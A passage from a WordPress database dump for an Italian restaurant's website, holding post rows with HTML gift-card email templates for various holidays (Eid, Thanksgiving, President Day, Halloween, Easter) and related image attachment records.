block;\">Ed:[EXPIRYDATE]</span></p></td></tr><td bgcolor=\"#d6ccfd\" style=\"padding-top: 45px; text-align: center; font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; color: #555555; \"></td><tr><td dir=\"ltr\" style=\"padding-bottom: 44px;\" align=\"center\" valign=\"top\" bgcolor=\"#d7ceff\" width=\"100%\"><table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\"><tbody><tr><td class=\"stack-column-center\" style=\"vertical-align: top;\" width=\"50%\"><table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\"><tbody><tr><td dir=\"ltr\" style=\"padding: 0px 25px;\" valign=\"top\">[DEFAULTEVENT]</td></tr></tbody></table></td><td class=\"stack-column-center\" style=\"vertical-align: top;\" width=\"50%\"><table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\"><tbody><tr><td class=\"center-on-narrow\" dir=\"ltr\" style=\"font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #ffffff; padding: 0px 15px; text-align: left;\" valign=\"top\"><p style=\"font-size: 15px; line-height: 24px; text-align: justify; color: #535151; min-height: 200px; white-space: pre-line;\">[MESSAGE]</p></td></tr><tr><td class=\"mail-content\" style=\"word-wrap: break-word; font-family: sans-serif; padding: 0px 15px;\"><span style=\"color: #535151; font-size: 15px; float: left; vertical-align: top; margin-right: 2% text-align: right; display-inline: block; width: 18%;\">From- </span> <span style=\"color: #535151; font-size: 14px; vertical-align: top; display: inline-block; width: 180px; float: left;\">[FROM]</span></td></tr><tr><td style=\"word-wrap: break-word; font-family: sans-serif; padding: 0px 15px;\"><span style=\"color: #535151; font-size: 15px; max-width: 15%; float: left; margin-right: 2%; text-align: right; width: 100%; display: inline-block; vertical-align: top;\">To- </span> <span style=\"color: #535151; font-size: 14px; width: 180px; float: left; vertical-align: top;\">[TO]</span></td></tr><tr><td style=\"padding: 5px 10px; word-wrap: break-word;\"><span style=\"color: #0e0149; font-size: 23.96px; vertical-align: top;\"><strong>[AMOUNT]/-</strong> </span></td></tr></tbody></table></td></tr></tbody></table></td></tr><tr><td bgcolor=\"#0e0149\"><table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td style=\"padding: 40px 30px; font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #ffffff;\"><p style=\"font-weight: bold; text-align: center;\">[DISCLAIMER]</p></td></tr></tbody></table></td></tr></tbody></table></center><style>@media screen and (max-width: 600px){.email-container{width: 100% !important; margin: auto !important;}/* What it does: Forces elements to resize to the full width of their container. Useful for resizing images beyond their max-width. */ .fluid{max-width: 90% !important; height: auto !important; margin-left: auto !important; margin-right: auto !important;}/* What it does: Generic utility class for centering. Useful for images, buttons, and nested tables. */ .center-on-narrow{text-align: center !important; display: block !important; margin-left: auto !important; margin-right: auto !important; float: none !important;}table.center-on-narrow{display: inline-block !important;}}@media screen and (max-width: 476px){/* What it does: Forces table cells into full-width rows. */ .stack-column, .stack-column-center{display: block !important; width: 100% !important; max-width: 100% !important; direction: ltr !important;}/* And center justify these ones. */ .stack-column-center{text-align: center !important;}}</style>','Happy Eid','','publish','closed','closed','','happy-eid','','','2017-07-10 21:43:26','2017-07-10 19:43:26','',0,'http://www.ristorantesolymar.it/giftcard/happy-eid/',0,'giftcard','',0),(416,1,'2017-07-10 21:44:37','2017-07-10 19:44:37','','thanksgive','','inherit','open','closed','','thanksgive','','','2017-07-10 21:44:37','2017-07-10 19:44:37','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/thanksgive.png',0,'attachment','image/png',0),(417,1,'2017-07-10 21:44:38','2017-07-10 19:44:38','','president-day','','inherit','open','closed','','president-day','','','2017-07-10 21:44:38','2017-07-10 19:44:38','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/president-day.png',0,'attachment','image/png',0),(418,1,'2017-07-10 21:44:39','2017-07-10 19:44:39','','halloween','','inherit','open','closed','','halloween','','','2017-07-10 21:44:39','2017-07-10 19:44:39','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/halloween.png',0,'attachment','image/png',0),(419,1,'2017-07-10 21:44:40','2017-07-10 19:44:40','','Group-1','','inherit','open','closed','','group-1','','','2017-07-10 21:44:40','2017-07-10 19:44:40','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/Group-1.png',0,'attachment','image/png',0),(420,1,'2017-07-10 21:44:40','2017-07-10 19:44:40','','Shape-4-copy-4','','inherit','open','closed','','shape-4-copy-4','','','2017-07-10 21:44:40','2017-07-10 19:44:40','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/Shape-4-copy-4.png',0,'attachment','image/png',0),(421,1,'2017-07-10 21:44:40','2017-07-10 19:44:40','','mother','','inherit','open','closed','','mother','','','2017-07-10 21:44:40','2017-07-10 19:44:40','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/mother.png',0,'attachment','image/png',0),(422,1,'2017-07-10 21:44:40','2017-07-10 19:44:40','','christmas','','inherit','open','closed','','christmas','','','2017-07-10 21:44:40','2017-07-10 19:44:40','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/christmas.png',0,'attachment','image/png',0),(423,1,'2017-07-10 21:44:40','2017-07-10 19:44:40','','banner','','inherit','open','closed','','banner','','','2017-07-10 21:44:40','2017-07-10 19:44:40','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/banner.png',0,'attachment','image/png',0),(424,1,'2017-07-10 21:44:41','2017-07-10 19:44:41','','independence','','inherit','open','closed','','independence','','','2017-07-10 21:44:41','2017-07-10 19:44:41','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/independence.png',0,'attachment','image/png',0),(425,1,'2017-07-10 21:44:41','2017-07-10 19:44:41','<center style=\"width: 100%; background: #222222;\"><div style=\"display:none;font-size:1px;line-height:1px;max-height:0px;max-width:0px;opacity:0;overflow:hidden;mso-hide:all;font-family: sans-serif;\">(Optional) This text will appear in the inbox preview, but not the email body.</div><table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin: auto;\" class=\"email-container\"><tr><td style=\"padding-top: 20px; text-align: left; background-color: #ffffff;color:#f48643;font-weight:bold;padding-left:20px;font-size:20px;font-family:sans-serif;\">[LOGO]</td></tr></table><table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin: auto;\" class=\"email-container\" align=\"center\"> <tr> <td bgcolor=\"#ffffff\"> <span style=\"display: block; margin: 0px auto; width: 100%;\" class=\"feature_image\"> [FEATUREDIMAGE] </span> </td></tr><tr><td style=\"background-color:#ffb001;padding:20px 0;\"> </td></tr><tr><td style=\"text-align: center; font-family: sans-serif; font-size: 15px; color: rgb(25, 118, 231); vertical-align: middle; display: table-cell; background: #f27326; padding: 5px;\"><h2 style=\"font-size: 16px; display: block; text-align:center!important; border: 2px dashed rgb(255, 255, 255); padding: 15px 0px; margin: 0px; color: rgb(255, 255, 255);\">COUPON CODE <span style=\"display:block; font-size:24px; padding:8px 0 0 0;\">[COUPON]</span> <span style=\"display:block;font-size:16px; padding:8px 0 0 0;\">(Ed:[EXPIRYDATE])</span></h2></td></tr><tr > <td dir=\"ltr\" style=\"padding:70px 10px 70px;\" width=\"100%\" valign=\"top\" bgcolor=\"#ffb001\" align=\"center\"><table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"><tr > <td class=\"stack-column-center\" width=\"50%\" valign=\"top\"> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"><tr ><td dir=\"ltr\" valign=\"top\" style=\"padding: 0 10px 0 10px;\">[DEFAULTEVENT]</td></tr></table></td><td width=\"50%\" valign=\"top\" class=\"stack-column-center\"><table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"><tr><td class=\"center-on-narrow\" dir=\"ltr\" style=\"font-family: sans-serif; font-size: 15px; line-height: 20px; color: rgb(255, 255, 255); padding: 0px 30px 0px 0px; word-wrap:break-word;\" valign=\"top\"><p style=\"color: rgb(255, 255, 255); font-size: 15px; height: auto; min-height: 180px; padding: 0px 0px 20px;\"> [MESSAGE] </p></td></tr><tr><td class=\"center-on-narrow\" dir=\"ltr\" style=\"font-family: sans-serif;font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #fff;word-wrap: break-word; \" valign=\"top\"><p style=\"margin-bottom:0px;font-size:16px;\"><span style=\"display: inline-block; width:20%;text-align:right;font-size:15px;vertical-align:top;\">From-</span><span style=\"display: inline-block;width: 180px;text-align:left;font-size:14px; vertical-align:top;\">[FROM]</span></p></td></tr><tr><td class=\"center-on-narrow\" dir=\"ltr\" style=\"font-family: sans-serif;font-size: 15px; mso-height-rule: exactly; line-height: 20px;word-wrap: break-word;color: #fff; \" valign=\"top\"><p style=\"margin-top:0px;font-size:16px;line-height:25px;\"><span style=\"display: inline-block; width:20%;text-align: right;font-size:15px; vertical-align:top;\">To-</span><span style=\"display: inline-block;width: 180px;text-align:left;font-size:14px;vertical-align:top;\">[TO]</span></p></td></tr><tr><td class=\"center-on-narrow\" dir=\"ltr\" style=\"font-family: sans-serif;font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #fff;padding:5px 10px;word-wrap: break-word;\" valign=\"top\"> <p style=\"text-align:left;font-weight:bold;font-size:28px;\"> <span style=\"color:#dd6e00; margin:20px 0; vertical-align:top;\">[AMOUNT]/- </span> </p></td></tr></table></td></tr></table></td></tr><tr ><td bgcolor=\"#f27326\"><table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" width=\"100%\"><tr><td style=\"padding: 40px; font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #fff; font-size:16px;\">[DISCLAIMER]</td></tr></table></td></tr></table></center><style>@media screen and (max-width: 599px){.email-container{width: 100% !important;margin: auto !important;}/* What it does: Forces elements to resize to the full width of their container. Useful for resizing images beyond their max-width. */.fluid{max-width: 100% !important;height: auto !important;margin-left: auto !important;margin-right: auto !important;}/* What it does: Forces table cells into full-width rows. */.stack-column,.stack-column-center{display: block !important;width: 100% !important;max-width: 100% !important;direction: ltr !important;}/* And center justify these ones. */.stack-column-center{text-align: center !important;}/* What it does: Generic utility class for centering. Useful for images, buttons, and nested tables. */.center-on-narrow{text-align: center !important;display: block !important;margin-left: auto !important;margin-right: auto !important;float: none !important;}table.center-on-narrow{display: inline-block !important;}}.feature_image > img{width: 100%;}</style>','Thanks Giving Day','','publish','closed','closed','','thanks-giving-day','','','2017-07-10 21:44:41','2017-07-10 19:44:41','',0,'http://www.ristorantesolymar.it/giftcard/thanks-giving-day/',0,'giftcard','',0),(426,1,'2017-07-10 21:44:41','2017-07-10 19:44:41','<center style=\"width: 100%; background: #222222;\"><div style=\"display:none;font-size:1px;line-height:1px;max-height:0px;max-width:0px;opacity:0;overflow:hidden;mso-hide:all;font-family: sans-serif;\">(Optional) This text will appear in the inbox preview, but not the email body.</div><table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin: auto;\" class=\"email-container\"><tr><td style=\"padding-top: 20px; text-align: left; padding-left: 20px; background-color: rgb(255, 255, 255); color: rgb(60, 100, 172); font-family: sans-serif; font-weight: bold; font-size: 20px;\">[LOGO]</td></tr></table><table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin: auto;\" class=\"email-container\" align=\"center\"><tr><td bgcolor=\"#fff\"><span class=\"feature_img\">[FEATUREDIMAGE]</span></td></tr><tr><td style=\"background-color:#fff;padding:20px 0;\"></td></tr><tr><td style=\"text-align: center; font-family: sans-serif; font-size: 15px; color: rgb(25, 118, 231); vertical-align: middle; display: table-cell; background: #ce2a2b; padding: 5px;\"><h2 style=\"font-size: 16px; text-align:center!important; display: block; color: rgb(25, 118, 231); background: rgb(206, 42, 43) none repeat scroll 0% 0%; margin: 0px; border: 2px dashed rgb(255, 255, 255); padding: 15px 0px; color: #ffffff;\">COUPON CODE <span style=\"display:block; font-size:24px; padding:8px 0 0 0;\">[COUPON]</span> <span style=\"display:block;font-size:16px; padding:8px 0 0 0;\">(Ed:[EXPIRYDATE])</span></h2></td></tr><tr > <td dir=\"ltr\" style=\"padding:70px 10px 70px;\" width=\"100%\" valign=\"top\" bgcolor=\"#ffffff\" align=\"center\"><table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"><tr ><td width=\"50%\" class=\"stack-column-center\" style=\"vertical-align: top;\"><table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"><tr ><td dir=\"ltr\" valign=\"top\" style=\"padding: 0 10px 0 10px;\">[DEFAULTEVENT]</td></tr></table></td><td width=\"50%\" valign=\"top\" class=\"stack-column-center\"><table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"><tr><td dir=\"ltr\" valign=\"top\" style=\"font-family: sans-serif;font-size: 15px; mso-height-rule: exactly; line-height: 20px;color: #000; margin:0px;word-wrap:break-word;\" class=\"center-on-narrow\"><p style=\"color:#000; font-size:15px;min-height:180px;height:auto; padding: 0px 0px 20px;margin:0 \">[MESSAGE]</p></td></tr><tr><td class=\"center-on-narrow\" dir=\"ltr\" style=\"font-family: sans-serif;font-size: 15px; mso-height-rule: exactly;word-wrap: break-word;line-height: 20px; color: #000; \" valign=\"top\"><p style=\"margin-bottom:0px;font-size:16px;\"><span style=\"display: inline-block; width:20%;text-align:right;font-size:15px; vertical-align:top;\">From-</span><span style=\"display: inline-block;width: 180px;text-align:left;font-size:14px; word-wrap: break-word; vertical-align:top;\">[FROM]</span></p></td></tr><tr><td class=\"center-on-narrow\" dir=\"ltr\" style=\"font-family: sans-serif;font-size: 15px; mso-height-rule: exactly; line-height: 20px;word-wrap: break-word;color: #000; \" valign=\"top\"><p style=\"margin-top:0px;font-size:16px;line-height:25px;\"><span style=\"display: inline-block; width:20%;text-align: right;font-size:15px;vertical-align:top;\">To-</span><span style=\"display: inline-block;width: 180px;text-align:left;font-size:14px; vertical-align:top;\">[TO]</span></p></td></tr><tr><td class=\"center-on-narrow\" dir=\"ltr\" style=\"font-family: sans-serif;font-size: 15px; mso-height-rule: exactly; line-height: 20px;word-wrap: break-word;color: #fff;padding:5px 10px;\" valign=\"top\"> <p style=\"text-align:left; vertical-align:top; font-weight:bold;font-size:28px;\"> <span style=\"color:#c31a1a; margin:20px 0;\">[AMOUNT]/- </span> </p></td></tr></table></td></tr></table></td></tr><tr ><td bgcolor=\"#ce2a2b\"><table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" width=\"100%\"><tr><td style=\"padding: 40px; font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #fff; font-size:16px;\">[DISCLAIMER]</td></tr></table></td></tr></table></center><style>@media screen and (max-width: 599px){.email-container{width: 100% !important;margin: auto !important;}/* What it does: Forces elements to resize to the full width of their container. Useful for resizing images beyond their max-width. */.fluid{max-width: 100% !important;height: auto !important;margin-left: auto !important;margin-right: auto !important;}/* What it does: Forces table cells into full-width rows. */.stack-column,.stack-column-center{display: block !important;width: 100% !important;max-width: 100% !important;direction: ltr !important;}/* And center justify these ones. */.stack-column-center{text-align: center !important;}/* What it does: Generic utility class for centering. Useful for images, buttons, and nested tables. */.center-on-narrow{text-align: center !important;display: block !important;margin-left: auto !important;margin-right: auto !important;float: none !important;}table.center-on-narrow{display: inline-block !important;}}.feature_img > img{margin: 0 auto; display: block; width:100%;}</style>','President Day','','publish','closed','closed','','president-day','','','2017-07-10 21:44:41','2017-07-10 19:44:41','',0,'http://www.ristorantesolymar.it/giftcard/president-day/',0,'giftcard','',0),(427,1,'2017-07-10 21:44:41','2017-07-10 19:44:41','<center style=\"width: 100%; background: #222222;\"> <div style=\"display:none;font-size:1px;line-height:1px;max-height:0px;max-width:0px;opacity:0;overflow:hidden;mso-hide:all;font-family: sans-serif;\"> (Optional) This text will appear in the inbox preview, but not the email body. </div><table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin: auto;\" class=\"email-container\"><tr><td style=\"padding-top: 20px; text-align: left; background-color: #092845;color:#ffffff;font-weight:bold;padding-left:20px;font-size:20px;font-family:sans-serif;\">[LOGO]</td></tr></table> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin: auto;\" class=\"email-container\"> <tr> <td bgcolor=\"#00203e\"> <span class=\"feature_img\">[FEATUREDIMAGE]</span> </td></tr><tr> <td bgcolor=\"#ffffff\" valign=\"middle\" style=\"text-align: center; background-position: center center !important; background-size: cover !important;\"><!--[if gte mso 9]><v:rect xmlns:v=\"urn:schemas-microsoft-com:vml\" fill=\"true\" stroke=\"false\" style=\"width:600px;height:175px; background-position: center center !important;\"><v:fill type=\"tile\" src=\"http://placehold.it/600x230/222222/666666\" color=\"#222222\"/><v:textbox inset=\"0,0,0,0\"><![endif]--><div> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"> <tr> <td valign=\"middle\" style=\"text-align: center; padding: 8px; font-family: sans-serif;mso-height-rule: exactly; line-height: 20px; color: rgb(54,79,103);\"> <h1 style=\"border:2px dashed #14314d; text-align:center!important; padding:33px; margin:0;font-size:15px;\">COUPON <span style=\"display: block; padding: 15px 0;font-size:25px;\">[COUPON]</span><span style=\"display: block;font-size:15px;\">(Ed:[EXPIRYDATE])</span></h1> </td></tr></table></div><!--[if gte mso 9]></v:textbox></v:rect><![endif]--></td></tr><tr> <td bgcolor=#00203e dir=\"ltr\" align=\"center\" valign=\"top\" width=\"100%\" style=\"padding: 70px 0;\"> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"> <td class=\"stack-column-center\" style=\"vertical-align: top; width: 50%; float:left;\"> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"> <tr> <td dir=\"ltr\" valign=\"top\" style=\"padding:0 15px;\"> [DEFAULTEVENT] </td></tr></table> </td><td class=\"stack-column-center\" style=\"vertical-align: top; width: 50%; \"> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"> <tr> <td dir=\"ltr\" valign=\"top\" style=\"font-family: sans-serif;font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #fff; min-height:180px;height:auto;padding:0 15px; word-wrap:break-word;\" class=\"center-on-narrow\"> <p style=\"word-spacing: 2px;text-align:left;font-size:16px;padding:0 0 20px 0\"> [MESSAGE] </p></td></tr><tr> <td dir=\"ltr\" valign=\"top\" style=\"font-family: sans-serif;font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #fff;word-wrap: break-word; \" class=\"center-on-narrow\"> <p style=\"margin-bottom:0px;font-size:16px;\"> <span style=\"display: inline-block; width:20%;text-align:right;font-size:15px;vertical-align:top;\">From-</span> <span style=\"display: inline-block;width: 180px;text-align:left;font-size:14px;vertical-align:top;\"> [FROM]</span> </p></td></tr><tr> <td dir=\"ltr\" valign=\"top\" style=\"font-family: sans-serif;font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #fff;word-wrap: break-word;\" class=\"center-on-narrow\"> <p style=\"margin-top:0px;font-size:16px;line-height:25px;\"> <span style=\"display: inline-block; width:20%;text-align: right;font-size:15px; word-wrap: break-word; vertical-align:top;\">To-</span> <span style=\"display: inline-block; vertical-align:top; width: 180px;text-align:left;font-size:14px;\"> [TO]</span> </p></td></tr><td dir=\"ltr\" valign=\"top\" style=\"font-family: sans-serif;font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #fff;padding:5px 10px;word-wrap: break-word;\" class=\"center-on-narrow\"> <p style=\"text-align:left;font-weight:bold;font-size:30px;margin:10px 0; vertical-align:top;\"> <span style=\"color:#fff; \"><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\"></span>[AMOUNT]</span>/-</span> </p></td></tr></table> </td></tr></table> <tr > <td bgcolor=\"#fff\"> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" width=\"100%\"> <tr> <td style=\"padding: 40px; font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #074da4; font-size:16px;\"> [DISCLAIMER] </td></tr></table> </td></tr></table> </center><style>@media screen and (max-width: 600px){.email-container{width: 100% !important; margin: auto !important;}@media screen and (max-width: 599px){.stack-column, .stack-column-center{display: block !important; width: 100% !important; max-width: 100% !important; direction: ltr !important;}}/* What it does: Forces elements to resize to the full width of their container. Useful for resizing images beyond their max-width. */ .fluid{max-width: 100% !important; height: auto !important; margin-left: auto !important; margin-right: auto !important;}/* What it does: Forces table cells into full-width rows. */ /* And center justify these ones. */ .stack-column-center{text-align: center !important;}/* What it does: Generic utility class for centering. Useful for images, buttons, and nested tables. */ .center-on-narrow{text-align: center !important; display: block !important; margin-left: auto !important; margin-right: auto !important; float: none !important;}table.center-on-narrow{display: inline-block !important;}}.feature_img > img{display: block; margin: 0 auto; max-width: 100%;}</style>','Halloween','','publish','closed','closed','','halloween','','','2017-07-10 21:44:41','2017-07-10 19:44:41','',0,'http://www.ristorantesolymar.it/giftcard/halloween/',0,'giftcard','',0),(428,1,'2017-07-10 21:44:41','2017-07-10 19:44:41',' <center style=\"width: 100%; background: #222222;\"> <div style=\"display:none;font-size:1px;line-height:1px;max-height:0px;max-width:0px;opacity:0;overflow:hidden;mso-hide:all;font-family: sans-serif;\"> (Optional) This text will appear in the inbox preview, but not the email body. </div><table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin: auto;\" class=\"email-container\"><tr><td style=\"padding-top: 20px; text-align: left; background-color: #074da4;color:#ffffff;font-weight:bold;padding-left:20px;font-size:20px;font-family:sans-serif;\">[LOGO]</td></tr></table> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin: auto;\" class=\"email-container\" align=\"center\"> <td bgcolor=\"#074da4\"> <span class=\"feature_img\"> [FEATUREDIMAGE]</span> </td></tr><tr> <td bgcolor=\"#fff\" style=\"text-align: center; font-family: sans-serif; font-size: 15px; color: rgb(25, 118, 231); vertical-align: middle; display: table-cell; background: rgb(25, 118, 231) none repeat scroll 0% 0%; padding: 20px 0px;\"> <span style=\"display: block; border-top: 3px dashed #fff; padding: 5px;\"></span> <h2 style=\"vertical-align: middle; text-align:center!important; font-size: 16px; display: block; color: rgb(25, 118, 231); background: rgb(255, 255, 255) none repeat scroll 0% 0%; padding: 15px 0px;\">COUPON CODE <span style=\"display:block; font-size:24px; padding:8px 0 0 0;\">[COUPON]</span> <span style=\"display:block;font-size:16px; padding:8px 0 0 0;\">(Ed:[EXPIRYDATE])</span></h2> <span style=\"display: block; border-bottom: 3px dashed #fff; padding: 5px;\"></span> </td></tr><tr > <td bgcolor=\"#1f81fa\" dir=\"ltr\" align=\"center\" valign=\"top\" width=\"100%\" > <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"> <tr > <td width=\"50%\" valign=\"top\" class=\"stack-column-center\" style=\"padding: 50px 0px;\"> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"> <tr > <td dir=\"ltr\" valign=\"top\" style=\"padding: 0 30px 0 30px;\"> [DEFAULTEVENT] </td></tr></table> </td><td width=\"50%\" valign=\"top\" class=\"stack-column-center\" style=\"padding: 50px 0px;text-align:left;\"> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"> <tr> <td dir=\"ltr\" valign=\"top\" style=\"font-family: sans-serif;font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #fff; min-height:170px;height:auto; word-wrap:break-word; \" class=\"center-on-narrow\"> <p style=\"word-spacing: 2px;text-align:left;font-size:16px;\"> [MESSAGE] </p></td></tr><tr> <td dir=\"ltr\" valign=\"top\" style=\"font-family: sans-serif;font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #fff;word-wrap: break-word; \" class=\"center-on-narrow\"> <p style=\"margin-bottom:0px;font-size:16px;\"> <span style=\"display: inline-block; width:20%;text-align:right;font-size:15px; vertical-align:top;\">From-</span> <span style=\"display: inline-block;width: 180px;text-align:left;font-size:14px; vertical-align:top;\"> [FROM]</span> </p></td></tr><tr> <td dir=\"ltr\" valign=\"top\" style=\"font-family: sans-serif;font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #fff;word-wrap: break-word; \" class=\"center-on-narrow\"> <p style=\"margin-top:0px;font-size:16px;line-height:25px;\"> <span style=\"display: inline-block; width:20%;text-align: right;font-size:15px; vertical-align:top;\">To-</span> <span style=\"display: inline-block;width: 180px;text-align:left;font-size:14px; vertical-align:top;\"> [TO]</span> </p></td></tr><td dir=\"ltr\" valign=\"top\" style=\"font-family: sans-serif;font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #fff;padding:5px 10px;word-wrap: break-word;\" class=\"center-on-narrow\"> <p style=\"text-align:left;font-weight:bold;font-size:28px; vertical-align:top;\"> <span style=\"color:#fff; margin:20px 0;\"><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\"></span>[AMOUNT]</span>/-</span> </p></td></tr></table> </td></tr></table> </td></tr><tr > <td bgcolor=\"#074da4\"> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" width=\"100%\"> <tr> <td style=\"padding: 40px; font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #fff; font-size:16px;\"> [DISCLAIMER] </td></tr></table> </td></tr></table> </center><style>/* Media Queries */ @media screen and (max-width: 600px){.email-container{width: 100% !important; margin: auto !important;}@media screen and (max-width: 599px){.stack-column, .stack-column-center{display: block !important; width: 100% !important; max-width: 100% !important; direction: ltr !important;}}/* What it does: Forces elements to resize to the full width of their container. Useful for resizing images beyond their max-width. */ .fluid{max-width: 100% !important; height: auto !important; margin-left: auto !important; margin-right: auto !important;}/* What it does: Forces table cells into full-width rows. */ /* And center justify these ones. */ .stack-column-center{text-align: center !important;}/* What it does: Generic utility class for centering. Useful for images, buttons, and nested tables. */ .center-on-narrow{text-align: center !important; display: block !important; margin-left: auto !important; margin-right: auto !important; float: none !important;}table.center-on-narrow{display: inline-block !important;}}.feature_img > img{margin: 0 auto; display: block;}</style>','Easter','','publish','closed','closed','','easter','','','2017-07-10 21:44:41','2017-07-10 19:44:41','',0,'http://www.ristorantesolymar.it/giftcard/easter/',0,'giftcard','',0),(429,1,'2017-07-10 21:44:41','2017-07-10 19:44:41','<center style=\"width: 100%; background: #222222;\"> <div style=\"display:none;font-size:1px;line-height:1px;max-height:0px;max-width:0px;opacity:0;overflow:hidden;mso-hide:all;font-family: sans-serif;\"> (Optional) This text will appear in the inbox preview, but not the email body. </div><table class=\"email-container\" role=\"presentation\" style=\"margin: auto;\" width=\"600\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\"> <tbody> <tr> <td style=\"text-align: center; background-color: #000000;\"> <p style=\"height: auto; background: #000000; font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #555555; font-size: 27.79px; text-transform: uppercase; color: #ffffff; font-weight: bold;\" width=\"200\" border=\"0\" height=\"50\">[LOGO]</p></td></tr></tbody> </table> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin: auto;\" class=\"email-container\"> <tr> <td bgcolor=\"#000000\"> <span class=\"feature_img\">[FEATUREDIMAGE] </span> </td></tr><tr style=\"margin-top: 20px;\"> <td bgcolor=\"#c31a1a\" style=\"text-align: center; font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #555555;\"> <h1 style=\"color: #ffffff; padding: 33px; margin: 10px; border: 2px dashed #ffffff; text-transform: uppercase; font-size: 15px; font-weight: 200; line-height: 27px; text-align:center!important;\">Coupon<span style=\"display:block; font-size:25px; padding:5px 0;\">[COUPON]</span><span style=\"display:block;\">(Ed:[EXPIRYDATE])</span></h1> </td></tr><tr> <td background=\"http://placehold.it/600x230/222222/666666\" bgcolor=\"#222222\" valign=\"middle\" style=\"text-align: center; background-position: center center !important; background-size: cover !important;\"><!--[if gte mso 9]> <v:rect xmlns:v=\"urn:schemas-microsoft-com:vml\" fill=\"true\" stroke=\"false\" style=\"width:600px;height:175px; background-position: center center !important;\"> <v:fill type=\"tile\" src=\"http://placehold.it/600x230/222222/666666\" color=\"#222222\"/> <v:textbox inset=\"0,0,0,0\"><![endif]--><!--[if gte mso 9]> </v:textbox> </v:rect><![endif]--> </td></tr><tr> <td bgcolor=\"#000000\" dir=\"ltr\" align=\"center\" valign=\"top\" width=\"100%\" style=\"padding: 30px 10px; text-align: center;\"> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"> <tr> <td width=\"50%\" class=\"stack-column-center\" style=\"vertical-align:top;\"> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" > <tr> 